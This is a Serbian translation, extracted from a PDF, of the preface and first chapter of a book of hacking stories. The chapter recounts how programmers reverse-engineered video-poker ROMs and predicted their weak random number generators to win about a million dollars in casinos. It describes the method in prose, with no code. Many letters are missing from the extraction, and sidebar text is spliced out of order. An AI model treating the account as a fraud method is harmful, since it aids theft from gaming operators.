Umece Provale

Predgovor
Hakeri klinci i oni ne tako mladi neprestano se nadmeu meu

sobom. Svakako bi se proslavio onaj ko bi se mogao pohvaliti upadom
u Web prezentaciju moje kompanije za bezbednost, ili u moj lini sistem.
Zadovostvo bi im priinilo i ako bi uspeli da izmisle priu o upadu u
neki sistem i predstave je meni i koautoru ove kige, Bilu Sajmonu, tako
uverivo da nas ona ponese, da poverujemo u u i ukuimo je u kigu.
To je pred nas dvojicu postavilo fascinirajui izazov, borbu umova
koja se odvijala svaki put kada smo vodili razgovore za ovu kigu. Veina novinara i pisaca lako utvruje autentinost izjave. Da li je osoba s
kojom razgovaraju zaista osoba za koju se predstava? Da li ta osoba jeste ili je bila na poloaju koji navodi? Da li ta osoba radi ili je radila za
navedenu organizaciju? Da li ta osoba ima dokumenta kojima bi potkrepila priu, i moe li se utvrditi da su ta dokumenta vaana? Postoje li
pouzdani udi koji e podrati priu ili neke ene delove?
Ali, iskrenost hakera malo je tee proveriti. Veina udi ije se prie
nalaze u ovoj kizi, osim nekoliko ih koji su ve bili u zatvoru, bili bi
sudski goeni ako bi ihov pravi identitet bio utvren. Zbog toga je
malo verovatno da e vam oni otkriti svoja prava imena kao dokaz.
Ispriali su mi svoje prie samo zato to mi veruju. Znaju da sam bio
u zatvoru, i oslaaju se na to da ih neu izdati i dovesti u situaciju u kojoj sam i sm bio. Uprkos rizicima, mnogi od ih su ponudili opipive
dokaze svojih upada.
Naravno, mogue je zapravo, verovatno je da su neki i preuveliali svoje uspehe, dodajui priama detae koji ih ine zanimivijim, ili da su razvili potpuno izmiene prie, ali su ih zasnovali na
ostvarivim podvizima, tako da zvue istinito.
Zbog tih rizika, vrsto smo se pridravali visokih standarda pouzdanosti. U svim razgovorima ispitivao sam svaki tehniki deta, traio detana objaea svega to nije zvualo verodostojno, a ponekad sam se
ix
Umee provale
kasnije vraao na istu priu da bih video da li je i dae ista, ili e sagovornik neto izmeniti. Sumu su budile osobe koje nisu mogle da se
sete kako su izvele neki teak korak i izostavile ga iz prie. Takoe, nisam verovao osobama koje nisu izgledale kao da znaju dovono da bi
uradile ono to tvrde da jesu, ili nisu mogle da objasne kako su stigle od
take A do take B.
Osim tamo gde je izriito navedeno drugaije, sve glavne prie u
ovoj kizi poloile su moj test verovatnoe. Bil i ja smo se sloili oko
uverivosti svake osobe ija je pria ukuena u kigu. Meutim, detae smo esto meali da bismo zatitili i hakera i rtvu.
U isto vreme, poto kompanije koje prave softver i hardver stalno
otklaau bezbednosne propuste pomou zakrpa i novih verzija proizvoda, samo jo neki podvizi opisani u kizi i dae imaju isti efekat. Previe samopouzdan italac mogao bi pomisliti da nema o emu da brine
poto e nedostaci biti otkloeni ili ve jesu, on ili egova kompanija
nemaju ega da se plae. Meutim, lekcija koju treba da nauite iz ovih
pria jeste da hakeri pronalaze nove slabosti svaki dan. Proitajte kigu
ne da biste saznali pojedinane nedostatke pojedinanih proizvoda,
ve da biste promenili svoje stavove i postali odluniji.
Proitajte je i da biste se zabavili, i poeli da boe shvatate iznenaujue podvige ovih opasno vetih hakera.
Neke prie su okantne, neke e vam otvoriti oi, a u nekima ete se
nasmejati inspiraciji i drskosti hakera. Ukoliko se bavite informacionim
tehnologijama ili bezbednou, iz svake prie saznaete kako da svoju
organizaciju uinite sigurnijom. Ako niste tehniki nastrojeni, ali volite
kriminalistike prie, pune drskosti, rizika i hrabrosti, sve to ete pronai u ovoj kizi.
Svaka opisana avantura suoava se sa opasnou nailaska na vrata iza
kojih, sa spremnim lisicama, eka itava potera policajaca, FBI agenata i
tipova iz tajne slube. U mnogim sluajevima, upravo to se i desilo.
Za one ostale, ta mogunost i dae postoji. Nije ni udo to neki od
ovih hakera nikada ranije nisu hteli da ispriaju svoje avanture. Veina
onih o kojima ete itati u ovoj kizi objavena je po prvi put.
Poglavlje 1
Hakerisanjem kazina
do milion dolara
Kad god [neki programer] kae: Niko se nee muiti oko toga, nae
se klinac u Finskoj raspoloen da se pomui.
Aleks Mejfild
ivotu svakog kockara doe magian trenutak kad jednostavna

uzbuea prerastu u 3D fantazije momenat kada pohlepa
proguta etiku, a sistem kazina postane samo jo jedna planina
koja eka da bude osvojena. U tom trenutku, matae o proverenom
nainu da se pobede stolovi ili maine oduzima dah.
Aleks Mejfild i egova tri druga nisu samo saarili. Kao i mnogi
drugi upadi, i ovaj je poeo kao veba inteligencije, provera da li je
neto mogue. Na kraju, ih etvorica su pobedili sistem i olakali kazina za oko milion dolara, pria Aleks.
Ranih devedesetih, etiri prijatea su radila kao savetnici za visoke
tehnologije i iveli oputeno i nonalantno. Znate ve radite, zaradite neke pare, a onda ne radite dok ne ostanete vorc.
Las Vegas je bio daleko dekor za snimae filmova i TV serija.
Upravo zato, kada je firma za razvoj tehnologije ponudila momcima
zadatak da naprave softver i isprate ga na tamou konvenciju o visokoj tehnologiji, oni su ponudu oberuke prihvatili. To bi im bila prva
poseta Vegasu, ansa da i sami vide betava svetla, i to s plaenim trokovima. Ko bi to odbio? Zasebni apartmani u velikom hotelu znaili su
da zabavi mogu da se pridrue i Aleksova supruga i Majkova devojka.
Dva para, plus Lari i Marko, otisnuli su se put vrelog Grada greha.
Aleks kae da nisu znali mnogo o kockau niti o tome ta da oekuju. Izaete iz aviona, a svuda oko vas starije gospoe igraju na slot mainama. Sve to izgleda smeno i ironino, i uvue vam se u svaku poru.
Poto su zavrili posao na sajmu, etiri prijatea i dve dame otili su
u kazino u svom hotelu, igrali na slot mainama i uivali u besplatnim
pivima, kada je Aleksova supruga pred ih postavila izazov.
Zar ove maine nisu zasnovane na raunarima? Momci, vi se

time bavite, zar ne moete da uinite neto da bismo osvojili
vie novca?
Umee provale
Drugari su se preselili u Majkov apartman i poeli da izbacuju pitaa i postavaju teorije o nainu na koji aparati rade.
Istraivae
To je bio okida. Sve to nas je zainteresovalo i, po povratku kui, poeli
smo da ispitujemo stvar, pria Aleks, oivavajui seaa na kreativnu
fazu. Vrlo brzo, istraivae je podralo ono to su ve pretpostavali.
Da, to su u osnovi raunarski programi. Zanimalo nas je postoji li
nain da provalimo te maine?
Neki udi su pobedili slot maine tako to su zamenili firmver u
mainu bi ubacili kompjuterski ip i program zamenili drugim koji bi
omoguio atraktivnije isplate nego to je kazino predvideo. Mada su
drugi timovi to radili, inilo se da takva akcija zahteva dogovor s radnikom kazina, i to ne sa bilo kojim radnikom, ve s tehniarem
zaduenim za slot maine. Za Aleksa i egove ortake zameivae
ROM-ova bilo je kao tresnuti baku po glavi i oteti joj tanu. Zakuili
su da bi se u sve to uputali samo ako bi cela akcija bila izazov za ihove
programerske vetine i intelekt. Povrh svega, oni nisu bili naroito talentovani za lano predstavae (engl. social egineering). Bavili su se
raunarima, ali nisu znali kako da priu zaposlenom u kazinu i predloe
da im se pridrui u maoj prevari kojom e uzeti neto tueg novca.
Ali kako e reiti problem? Aleks je objasnio:
Pitali smo se da li bismo mogli predvideti sekvencu karata. Ili,

da li moda postoje zada vrata [programski kd koji omoguava kasniji neovlaen pristup programu], koja je neki programer napravio radi sopstvene koristi. Sve programe su pisali
programeri, a oni su vragolasti stvorovi. Pomislili smo da

bismo mogli nabasati na zada vrata, na primer tako to
emo pritisnuti odreenu sekvencu dugmadi i tako promeniti
verovatnou dobitka, ili sami programirati pukotinu koju
bismo mogli da iskoristimo.
3
Poglavlje 1: Hakerisanjem kazina do milion dolara
Aleks je proitao kigu The Eudaemonic Pie Tomasa Basa (Thomas

Bass) (Penguin, 1992), priu o grupi momaka koji su se bavili raunarima i fizikom. Oni su osamdesetih pobedili rulet u Las Vegasu koristei
sopstvenu verziju prenosivog raunara, veliine pakle cigareta, koji je
predviao rezultat na ruletu. Jedan lan tima za stolom pritiskao je dugmad unosei brzinu toka ruleta i nain rotiraa kuglice. Raunar je
radio-talasima prenosio tonove u sluni aparat drugog lana tima koji je
tumaio signal i kladio se na odgovarajui broj. Oekivali biste da su
odneli tonu novca, ali nisu. Po Aleksovom mieu, Njihova ema je
imala ogroman potencijal, ali je bila sputana nezgrapnom i nepouzdanom tehnologijom. Takoe, bilo je previe uesnika, pa su problem
predstavali i ponaae i meusobni odnosi. Mi smo reili da ne ponovimo ihove greke.
Aleks je zakuio da bi bilo lake pobediti igru zasnovanu na raunaru jer su raunari potpuno predvidivi rezultat zavisi od onoga to
se prethodno desilo, ili, da parafraziramo staru izreku vezanu za lano
predstavae, ubaci dobre podatke, dobije dobre podatke. (Originalan izraz na ovo gleda iz negativne perspektive: ubaci ubre, dobije
ubre.)
To mu je savreno odgovaralo. Kao mladi, Aleks je bio muziar, svirao je u kultnom bendu i saao o tome da postane rok zvezda, a kada
to nije uspelo, prebacio se na prouavae matematike. Imao je talenta
za matematiku i, mada nikada nije mario za kole (napustio je koled),
nastavio je da se bavi tom temom sve dok nije stekao solidan nivo
znaa.
Poto je zakuio da je istraivae neophodno, otputovao je u
Vaington i proveo neko vreme prouavajui dokumentaciju u zavodu
za patente. Pomislio sam da je neko moda bio dovono glup da sav
kd ubaci u patent za videopoker aparat. I naravno, bio je u pravu. U
to vreme, strpati gomilu objektnog koda u patent bio je nain da podnosilac patenta zatiti svoj izum, jer kd sadri detaan opis izuma, ali u
obliku koji nije naroito razumiv korisnicima. Uzeo sam mikrofilm sa
Umee provale
objektnim kodom i pregledao strane pune heksadecimalnih brojeva

traei zanimive odeke, koji su morali biti pretvoreni [u upotrebiv
oblik].
Analizirae koda otkrilo je nekoliko tajni koje su zaintrigirale tim,
ali su zakuili da se, ukoliko bi da odmaknu dae, moraju doepati
konkretne maine koju hoe da hakeriu, i sami pogledaju kd.
Njih etvorica su inili dobro usklaen tim. Majk je bio vie nego
kompetentan programer, i znao je vie o hardveru nego ostala trojica.
Marko, jo jedan bistar programer, bio je emigrant iz Istone Evrope tinejderskog izgleda. Ali, bio je prilino smeo pametakovi koji je
svemu prilazio sa stavom mogu ja to. Aleks je bio odlian programer i
doprineo je svojim poznavaem ifrovaa. Lari nije bio naroito dobar
programer, a zbog udesa s motorom nije mogao mnogo da putuje.
Meutim, on je bio odlian organizator koji je usmeravao projekat i vodio rauna da se svi fokusiraju na ono to u odreenoj fazi treba obaviti.
Posle poetnih istraivaa, Aleks je zaboravio na projekat. Ali
Marko se zagrejao za ideju. Nastavio je da insistira: Nije to nikakav
problem, maine se mogu legalno kupiti u trinaest drava. Na kraju je
uspeo da ubedi ostale da pokuaju. Pomislili smo, to da ne. Uspeli su
da izdvoje dovono novca za put i kupovae maine. Ponovo su se
uputili u Vegas ovaj put o svom troku i s drugim ciem na pameti.
Aleks pria: Da biste kupili slot mainu, trebalo je samo da uete u
radu i pokaete linu ispravu iz drave u kojoj takvu mainu moete
legalno posedovati. Ukoliko ste imali vozaku dozvolu iz neke od tih
drava, niko vas nije previe ispitivao. Jedan od ih je imao zgodnu
vezu sa stanovnikom drave Nevada. Bio je to ujak neije devojke, ili
tako neto, i on je iveo u Vegasu.
Odluili su da Majk razgovara s tim ovekom jer ima drae trgovca i vrlo je reprezentativan tip. Pretpostava se da ete mainu koristiti
za nelegalno kockae. Isto kao sa orujem, Aleks je objasnio. Mnogo
maina je dospevalo na sivo trite prodavano je van dozvoenih kanala klubovima i slinim mestima. Ipak, iznenadilo ga je to su mogli
da kupe potpuno isti aparat kao to su oni u kazinu.
Majk je oveku dao 1.500 dolara za mainu japanske proizvode.
Onda smo nas dvojica utovarili prokletiu u kola. Vozili smo kui kao
da na zadem seditu imamo bebu.
Razvijae upada
Majk, Aleks i Marko su odteglili aparat uz stepenice, na drugi sprat
kue u kojoj su mogli da koriste slobodnu spavau sobu. Ovo iskustvo
je Aleks dugo pamtio kao jedno od najveih uzbuea u svom ivotu.
Aparat koji je Aleks odabrao koristio se ve desetak godina. Kad god

kazino hoe da kupi mainu novog dizajna, Komisija za kockae (Las
Vegas Gaming Commission) mora da proui program i pobrine se da
on bude takav da isplate igraima budu potene. Odobravae novog
dizajna moe potrajati, pa kazina zadravaju stare aparate due nego to
biste oekivali. inilo se da e starija maina verovatno sadrati prevazienu tehnologiju i tim se nadao da e je lake napasti.
Raunarski kd koji su preuzeli sa ipa bio je u binarnom obliku
niz jedinica i nula koje predstavaju osnovni nivo kompjuterskih uputstava. Da bi ih preveli u oblik s kojim bi mogli da rade, prvo su morali
da se pozabave reverznim ineeringom (engl. reverse engineering)
procesom kojim ineer ili programer utvruje kako je postojei proizvod projektovan. U ovom primeru, to je znailo prevoee jezika maine u kd koji su momci mogli da razumeju i s kojim su mogli da rade.
Aleksu je trebao disasembler za prevoee koda. etvorka nije
htela da izazove sumu kupovinom programa to bi bilo kao da su
otili u biblioteku i pozajmili kige o praveu bombe. Sami su napisali disasembler, a Aleks taj posao opisuje kao ne ba prost ko pasu, ali
zabavan i relativno lak.
Poto su kd iz poker aparata propustili kroz novi disasembler, tri
programera su sela i poela da prolivaju znoj nad im. Vian projektant softvera obino brzo pronalazi delove programa na koje hoe da se
5
Otvorili smo je, izvadili ROM i utvrdili koji je to procesor. Ja

sam odluio da uzmemo japansku mainu koja je izgledala
kao imitacija jedne poznate marke. Pomislio sam da su
ineeri moda bili pod veim pritiskom, pa su bili lei ili
malo nemarniji.
Ispostavilo se da sam bio u pravu. Koristili su [ip] 6809,
slian ipu 6502 koji ste mogli nai u raunaru Apple II ili
Atari. Bio je to 8-bitni ip s memorijom od 64K. Poto sam
programirao na asemblerskim jezicima, bio mi je poznat.
Umee provale
usredsredi. To je zato to osoba koja pie kd svud po emu ostava

saobraajne znake napomene, komentare i primedbe koji objaavaju funkciju svakog dela koda, slino kao to kiga ima naslove delova,
poglava, i podnaslove odeaka unutar poglava.
Kada se program prevede u oblik koji maina moe da proita, ti saobraajni znaci se ignoriu raunaru ili mikroprocesoru oni ne trebaju.
Zbog toga, kodu dobijenom ovakvom analizom nedostaju ta korisna
objaea. Da se opet posluimo metaforom saobraajnih znakova
ovako dobijen kd lii na mapu bez imena mesta, bez oznaka autoputeva ili ulica.
Pregledali su strane koda na ekranu traei odgovore na osnovna pitaa: Koja logika je primeena? Kako se karte meaju? Kako se biraju
karte za zamenu? Ipak, u tom trenutku najvanije im je bilo da
pronau kd generatora sluajnih brojeva (engl. random number generator). Aleks je ispravno pretpostavio da su japanski programeri koristili
preice koje su ostavile greke u kodu generatora sluajnih brojeva. Zaista su ih koristili.
Ponovno pisae koda

Aleks ponosno opisuje svoj trud. Bili smo programeri i bili smo dobri u
onome to smo radili. Shvatili smo kako se brojevi u kodu pretvaraju u
karte na maini i napisali smo kd na jeziku C koji e raditi isto,
ispriao je.
Imali smo motivaciju i non-stop smo radili. Mislim da nam je

trebalo dve ili tri nedee da doemo do take kada smo zaista
znali ta se deava u kodu.
Pogleda kd, pretpostavi emu slui, napie nov kd, baci
ga na ROM [raunarski ip], vrati u aparat i gleda ta se
deava. Pisali smo rutine koje na ekranu preko karata ispisuju
heksadecimalne brojeve. Tako smo dobili neku vrstu pregleda
naina na koji kd deli karte.
Bila je to kombinacija pokuaja i greaka i dubinske analize.
Kd je vrlo brzo poeo da poprima smisao. Gotovo precizno
smo shvatili kako se brojevi u raunaru pretvaraju u karte na
ekranu.
Nadali smo se da je generator sluajnih brojeva bio relativno

jednostavan. A ranih devedesetih bio je upravo takav. Malo
sam istraivao i otkrio da je zasnovan na neemu to je
Donald Knut napisao jo ezdesetih. Ti tipovi nisu nita izmislili, samo su iskoristili postojee istraivae metoda iz Monte
Karla i slinih stvari, i ubacili ga u svoj kd.
Otkrili smo taan algoritam koji su koristili za generisae
karata. Zove se linearni pomini registar sa povratnom vezom
(engl. linear feedback shift register, LFSR) i prilino je dobar
generator sluajnih brojeva.
Ukoliko bi brojevi zaista bili nasumini, ne biste mogli podesiti kvote. Ne bi mogli da se procene izgledi. Neki aparati uzastopno daju fle rojale. A oni ne bi trebali uopte da se
pojavuju. Zbog toga projektanti ele mogunost provere
ispravnosti statistike, inae imaju oseaj da ne kontroliu igru.
Druga stvar koju projektanti nisu shvatili kada su napravili
ovaj aparat, jeste to da im ne treba samo generator sluajnih
brojeva. Statistiki u svakom deeu ima deset karata pet
koje se vide na poetku, i po jedna zamena za svaku od poetnih karata koja e se pojaviti ukoliko igra odlui da je odbaci.
Ispostavilo se da su rane verzije aparata tih deset karata uzimale iz deset sekvencijalnih nasuminih brojeva u generatoru
sluajnih brojeva.
Tako su Aleks i egovi partneri shvatili da su programske instrukcije
ovih starijih maina loe smiene. A zbog tih greaka videli su da mogu
napisati relativno jednostavan, ali elegantan i domiat algoritam kojim
e pobediti mainu.
Meutim, uskoro su otkrili da ovaj generator ima fatalnu greku

koja im je mnogo olakala posao. Majk je objasnio da je to bio relativno jednostavan 32-bitni generator sluajnih brojeva, pa je bilo mogue
dostii sloenost izraunavaa potrebnu za egovo provaivae, a uz
nekoliko dobrih optimizacija stvar je postala gotovo trivijalna.
Znai, dobijeni brojevi nisu bili zaista nasumini. Aleks smatra da
postoji dobar razlog zato je moralo biti tako.
Aleks je primetio da je trik u tome da ponete igru, vidite koje su

karte prikazane na maini, i unesete podatke za identifikovae tih karata u raunar kod kue. Algoritam e izraunati gde je generator sluajnih brojeva bio i kroz koliko brojeva treba da proe pre nego to bude
spreman da prikae eene karte fle rojal.
Seli smo za na aparat, pokrenuli svoj programi i on nam je

tano rekao koja e biti sledea sekvenca karata. Bili smo prilino uzbueni.
Umee provale
To uzbuee Aleks je pripisao oseau da ste pametniji od nekoga

i znate da ga moete pobediti. A to e, u naem sluaju, doneti i novac.
Otili su u kupovinu i pronali runi sat marke Casio s funkcijom
odbrojavaa koja se moe podesiti na desetine sekunde. Kupili su tri
sata, po jedan za svakog lana koji e ii u kazina. Lari e ostati u bazi i
odravati raunar.
Bili su spremni za testirae metode. Jedan lan tima bi poeo da
igra i javio bi koje je karte dobio broj i boju svih pet karata. Lari bi
uneo podatke u ihov raunar. Mada je egova marka bila mae poznata, bio je to popularan raunar kod zaluenika i odlian izbor za ovu
namenu, jer je imao mnogo bri ip od onog u japanskom poker aparatu. Trebalo mu je samo nekoliko trenutaka da izrauna tano vreme za
odbrojavae koje treba podesiti na Casio satu.
Kada se sat oglasi, igra na slot maini treba da pritisne dugme Play.
Ali, to je morao uraditi u deliu sekunde. Aleks objaaava da to i nije
bio toliko veliki problem kako se moda ini.
Nas dvojica smo neko vreme bili muziari. Kada ste muziar i
imate dovono oseaja za ritam, moete pritisnuti dugme s
kaeem maim od pet milisekundi.
Ukoliko sve bude radilo kao to je planirano, aparat e prikazati
traeni fle rojal.
Vebali su na svom aparatu dok svi nisu uspeli da otvore fle rojal nakon prihvativog broja pokuaja.
U prethodnim mesecima, po Majkovoj prii, oni su izdvojili programski kd aparata, precizno utvrdili kako se sluajni brojevi pretvaraju u karte na ekranu, tano odredili kada i koliko brzo generator
sluajnih brojeva pravi petu, nauili sve bitne specifinosti maine i

razvili program koji e sve te promenive uzimati u obzir. Kada vam je
poznato stae pojedinane maine u odreenom trenutku, s visokom
preciznou moete predvideti ponavae sluajnih brojeva u bilo kom
trenutku u sledeih nekoliko sati, pa ak i dana.
Pobedili su mainu pretvorili je u svog roba. Prihvatili su intelektualni izazov koji je upad postavio i pobedili su. Znae je moglo da ih
uini bogataima.
Bilo je lepo saariti o tome. Ali, da li su zaista mogli da izvedu akciju u dungli kazina?
Jedna je stvar privatno petati oko svog aparata, na bezbednoj lokaciji.

Sesti usred prepunog kazina i ukrasti novac to je potpuno druga pria.
Za to su potrebni elini ivci.
Njihove dame su mislile da putuju samo radi zabave. Momci su ih
ohrabrili da obuku uske sukice i upadivo se ponaaju kockaju se,
priaju, kikou, naruuju pia nadajui se da e udi iz obezbeea
koji upravaju kamerama biti ometeni lepim licima i oblinama. Zato
smo insistirali na tome to smo vie mogli, sea se Aleks.
Nadali su se da e se uklopiti, stopiti s masom. Majk je bio najboi.
Bio je proelav, i on i egova supruga su izgledali kao tipini igrai.
Aleks opisuje scenu kao da se sve desilo jue. Marko i Majk su akciju
opisali malo drugaije, ali evo kako je sve izgledalo Aleksu. Sa svojom suprugom Eni prvo je obiao kazino i odabrao jedan video poker aparat.
Morao je s velikom preciznou znati taan ciklus maine. Jedna metoda
koju su koristili bila je da video kameru stave u torbicu. U kazinu bi
igra postavo torbicu tako da objektiv kamere bude usmeren na ekran
poker aparata i drao je neko vreme ukuenu. Bilo je nezgodno, sea
se, postaviti torbu na odgovarajue mesto, a pri tom ne izgledati kao da
je poloaj torbe bitan. Prosto, ne elite da uradite nita to bi delovalo
sumivo i privlailo pau. Majk je vie voleo drugu metodu, koja je
bila mae zahtevna: Ciklus ponavaa brojeva na nepoznatom aparatu izraunavali smo pomou dva oitavaa karata sa ekrana, u razmaku
od vie sati. Morao je biti siguran da na maini u meuvremenu niko
nije igrao jer bi se time promenila brzina ponavaa, ali to je bilo lako:
Povratak u kazina ovaj put radi igre
Umee provale
10
samo je trebalo da proveri da li su na ekranu prikazane karte koje je

ostavio kada je posledi put igrao na maini, a to je obino bio sluaj jer
se na mainama s visokim ulozima ne igra esto.
Nakon drugog uitavaa prikazanih karata, podesio bi odbrojavae
na Casio satu, a potom bi telefonom javio Lariju podatke o vremenu i
sekvencama karata. Lari bi ih uneo u ihov raunar i pokrenuo program.
Na osnovu tih podataka, raunar bi predvideo vreme sledeeg fle rojala.
Nadate se da e se to desiti u roku od nekoliko sati, ali ponekad je trebalo da proe nekoliko dana, pa bi u tom sluaju pokuali s drugim aparatom, esto u drugom hotelu. Podeeno vreme na Casio satu moglo bi biti
promaeno i za oko minut, ali ipak je bilo dovono precizno.
Aleks i Eni su se u kazino vraali dosta ranije u sluaju da je neko seo
za aparat koji oni ele, i igrali na drugim aparatima dok ihov ne bude
slobodan. Aleks bi seo za cini aparat, a Eni za aparat do ega. Poeli bi
da igraju i trudili se da izgledaju kao da se zabavaju. A onda:
Ja bih poeo da igram, podeavajui tajmer na runom satu.

Zapamtio bih podeene karte vrednost i boju svih pet
karata, a potom nastavio da igram sve dok ne zapamtim osam
karata u sekvenci. Klimnuo bih svojoj eni kao znak da odlazim i krenuo ka zakloenijoj javnoj govornici izvan dvorane
kazina. Imao sam oko osam minuta da odem do telefona, obavim ta sam morao i vratim se za aparat. Moja ena je nastavala da igra. Ukoliko bi neko hteo da koristi moj aparat, ona
bi mu rekla da tu sedi en suprug.
Smislili smo nain da pozovemo Larijev broj pejdera i da
preko brojeva na tastaturi telefona unesemo karte. Tako nismo
morali da izgovaramo oznake karata udi iz kazina uvek
oslukuju takve stvari. Lari bi ponovo uneo karte u raunar i
pokrenuo program.
Potom bih ga pozvao. On bi slualicu drao iznad raunara
koji bi dao dva kratka zvuna signala. Kada bih uo prvi
zvuk, pritisnuo bih pauzu na brojau sata i zaustavio odbrojavae. Kada bih uo drugi zvuk, ponovo bih pritisnuo
pauzu da bih restartovao broja.
Karte koje je Aleks javao govorile su raunaru taan poloaj na kom

je bio generator sluajnih brojeva poker aparata. Unoeem kaea
koje je odredio raunar, Aleks je unosio kunu ispravku u broja svog
Casio sata tako da se on oglasi tano u trenutku kada e se pojaviti fle
rojal.
Kada je prvi put osvojio novac, Aleks je bio veoma uzbuen, ali
uplaen. Nadzornik stolova je bio neki namrgoeni Italijan. Bio sam siguran da me udno gleda, sa zbuenim izrazom lica, moda zato to
sam stalno telefonirao. Mislim da je otiao da preslua trake. Uprkos
napetosti, imalo je to svojih ari. Majk se prisea: Naravno, bio sam
nervozan jer je neko mogao da primeti moje sumivo ponaae, ali zapravo, niko me nije udno gledao. Mene i moju suprugu tretirali su kao
i druge dobitnike visokih uloga estitali su nam i davali poklone.
Bili su toliko uspeni da su morali voditi rauna o tome da ne osvoje
previe novca i ne privuku pau na sebe. Suoili su se s retkim problemom prevelikog uspeha. Sve je bilo vrlo javno. Osvajali smo ogromne
dek potove u desetinama hiada dolara. Fle rojal ima kvotu 4000 prema 1. Na aparatu u koji se ubacuje 5 dolara, to je dvadeset hiada.
Cifre su i vee. Neke igre su progresivne glavni zgoditak raste sve
dok ga neko ne osvoji, a ovi momci su mogli i ih lako da dobiju.
Osvojio sam jedan koji mi je doneo 45 hiada. Priao mi je tehniar sa irokim pojasom on verovatno i poprava maine. Taj
ovek ima poseban ku koji nemaju udi to rade u dvorani.
Otvori kuite, izvadi [elektronsku] plou, izvadi ROM ip
pred vama. Sa sobom nosi ita ROM-a i testira ip iz maine
poredei ga sa zlatnim masterom koji se uva pod kuem.
11
Poto bih restartovao broja sata, vraao sam se aparatu. Kada

bi se broja oglasio sa bip, bip, bum ba tada, u trenutku
tog bum, ponovo bih pritisnuo dugme Play na aparatu.
U tom prvom pokuaju mislim da sam osvojio 35.000 dolara.
Doli smo do oko 30 ili 40 procenata uspenosti jer je sve bilo
dobro razraeno. Nismo uspevali samo kada bismo uneli
pogreno vreme.
Umee provale
12
Aleks je saznao da je provera ROM-a standardna procedura ve vie

godina. Pretpostava da su ih dosad dosta ispaivali, pa su najzad otkrili kako da izvedu proveru ROM-a kao protivmeru.
Aleksova izjava me je navela da se zapitam da li kazina obavaju ove
provere jer su neki tipovi koje sam sreo u zatvoru zameivali firmver.
Pitao sam se kako su to mogli tako brzo da obave i izbegnu otkrivae.
Aleks smatra da je tajna u lanom predstavau sigurno su se dogovorili sa obezbeeem i potplatili nekog u kazinu. On je pretpostavao
da su moda zamenili i zlatni master s kojim se poredi ip iz aparata.
Aleks ostaje pri tome da je lepota upada koji je obavio egov tim
bila je u tome to nisu morali da meaju firmver. A smatrali su da je
ihov pristup bio i mnogo vei izazov.
Tim nije smeo da nastavi da osvaja toliko novca. Bilo je jasno da e
neko sabrati dva i dva i rei: Ovog tipa sam ve negde video. Uplaili
smo se da e nas uhvatiti.
Pored stalno prisutnih briga da e biti uhvaeni, morali su se pozabaviti i pitaem poreza. Za svaki dobitak preko 1.200 dolara, kazino trai
lina dokumenta i isplatu prijavuje poreskoj slubi. Majk kae: Pretpostavali smo da e, ukoliko igra ne d linu kartu, porez biti odbijen
od dobitka, ali nismo hteli da privlaimo pau otkrivajui da li je ta
pretpostavka tana. Plaae poreza nije bilo veliki problem, ali ono
ostava podatke koji govore da osvajate nenormalne koliine novca.
Zbog toga se mnogo planiraa odnosilo na pronalaee naina da
ostanemo u potaji.
Morali su da smisle drugaiji pristup. Nakon kraeg vremena telefoniraa kui, rodila se nova ideja.
Nov pristup
Ovaj put momci su imali dva cia: razvijae metode koja bi im
omoguila da otvore ful, kentu ili pet karata iste boje, tako da isplate ne
budu homogene i ne privlae pau. Drugi ci je da cela akcija bude
mae oigledna i mae dosadna od stalnog trkaraa do telefona pre
svake igre.
Poto je u kazinima postojao ogranien broj japanskih aparata,
momci su se ovaj put ustremili na ameriku mainu koja se vie koristi.
Rastavili su je na isti nain i otkrili da je proces generisaa sluajnih
Da su projektanti paivije proitali neke kige o sistemima

ifrovaa, ne bi napravili ovu greku. Takoe, trebalo je da
budu metodiniji prilikom testiraa sistema da bi ga razbili
onako kako smo ga mi razbili.
Svaki student koji je diplomirao raunarske nauke verovatno
bi mogao da napie kd koji bi radio ono to smo mi pokuavali da uradimo, im biste mu rekli ta se trai. Najkakiviji
deo odnosio se na pronalaee algoritama koji bi brzo obavili
pretragu i u roku od nekoliko sekundi rekli ta se deava. Ako
biste to naivno uradili, pronalaee reea moglo bi trajati
nekoliko sati.
Mi smo prilino dobri programeri, i svi i dae zaraujemo od
tog posla, pa smo doli do nekih vrlo matovitih optimizacija.
Ipak, ne bih to nazvao trivijalnostima.
Seam se sline greke koju je napravio programer kompanije Norton
(pre nego to ga je Symantec kupio) radei na ihovom proizvodu Diskreet, programu koji je korisniku omoguavao da pravi ifrovane virtuelne ureaje. On je pogreno ugradio algoritam a moda je to uradio i
13
brojeva mnogo sloeniji: aparat je koristio dva generatora koji su se

kombinovali, umesto samo jednog. Programeri su bili mnogo svesniji
mogunosti upada hakera, zakuio je Aleks.
Ali i ovde su etvorica otkrila bitnu greku projektanata. Verovatno
su na papiru proitali da se nasuminost poveava ako dodate drugi registar, ali to su uradili pogreno. Da bi se odredila bilo koja karta, broj
iz prvog generatora sluajnih brojeva sabiran je s brojem iz drugog.
Da bi ovo ispravno funkcionisalo, drugi generator bi morao da
krui tj. da mea svoju vrednost nakon deea svake karte. Projektanti to nisu uradili; programirali su drugi registar da krui na poetku svakog deea, pa se za svaku kartu u jednom deeu rezultatu
prvog registra dodaje isti broj.
Koriee dva registra bio je izazov za Aleksa zadatak iz kriptologije. Liilo mu je na korake koji su se ranije koristili u ifrovau poruka. Mada je znao poneto o toj temi, to nije bilo dovono da pronae
reee, pa je poeo da putuje do obiliee univerzitetske biblioteke i
istrauje.
Umee provale
14
namerno pa je prostor za ku ifre smaen sa 56 bitova na 30. ak i

u to vreme, bilo je mogue na silu pogoditi 30-bitni ku. Svako ko je
koristio ovaj proizvod neosnovano se oseao bezbednim: napada je
mogao da otkrije ku u razumnom vremenskom periodu i doe do
podataka. Tim je otkrio istu vrstu greke u programskom kodu aparata.
Dok su radili na raunarskom programu koji bi im omoguio da dobiju na novoj cinoj maini, momci su pritiskali i Aleksa da osmisli pristup koji nee zahtevati da tre do govornice. Inspiraciju za reee
pronali su na stranama kige Eudaemonic Pie : nosivi raunar. Aleks
je izumeo sistem saien od minijaturnog kompjutera, napravenog
oko male mikroprocesorske ploe koju su Majk i Marko pronali u katalogu. Uz u je ilo i kontrolno dugme koje je moglo stati u cipelu, i
beumni vibrator poput onih iz danaih mobilnih telefona. Sistem su
zvali svojim depnim kompjuterom.
Morali smo da smislimo kako da ga napravimo na malom ipu s
malom memorijom, pria Aleks. Napravili smo fin hardver, pa je sve
moglo da stane u cipelu i bilo je ergonomskog oblika. (Ergonomski
je u ovom sluaju znailo da je ureaj bio dovono mali da moete hodati bez hramaa!)
Novi napad
